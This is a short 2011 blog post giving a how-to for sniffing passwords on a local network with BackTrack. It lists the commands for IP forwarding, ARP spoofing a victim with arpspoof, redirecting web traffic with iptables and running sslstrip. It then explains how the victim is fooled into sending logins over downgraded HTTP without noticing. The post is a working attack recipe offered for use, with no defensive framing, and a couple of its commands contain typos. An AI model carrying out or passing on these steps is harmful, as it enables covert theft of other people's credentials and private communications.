Wednesday, 2 March 2011

How to sniff passwords or everything typed in a browser client with SSLSTRIP

0) Open a shell in your backtrack.
1) echo 1 > /proc/sys/net/ipv4/ip_forward
2) arpspoof -t eth0 -t 192.168.127.xxx(CLIENT) 192.168.127.1(GW)
3) iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4) pythton sslstrip.py -w secret

Now, what does each part?
1) Enable the packet forward .
2) Your machine(backtrack) becomes the GW for that unique client, you can also become the gateway for the WHOLE network, just remove the target.
3) Redirect all packets to port 10000
4) Listen on port 10000 and log all the things that the client typed with SSL or without.

Ok, now lets explain what happen in the whole process.
Behind the scene : You fool that specific client to believe that your are his gateway spoofing the ARP table in his machine, now, instead going out via the REAL gateway, all his packets will go out via YOUR machine, in this case, your backtrack. So, you can see everything that the client types in his browser even SSL encripted pages , how? Well, that's the idea, you are stripping the SSL away with sslstrip :)
On the client side: He will not be aware of this, the only thing that will be different in his machine, is when he browses a SSL website like.. https://hotmail.com , instead https it will appear as http://hotmail.com , so if the client don't check if there is a lock in the url address bar..(and they usually don't check that) You will log everything with no problem.
Be aware that some sites don't work without the SSL, so, test it before your try.

No comments:

Post a Comment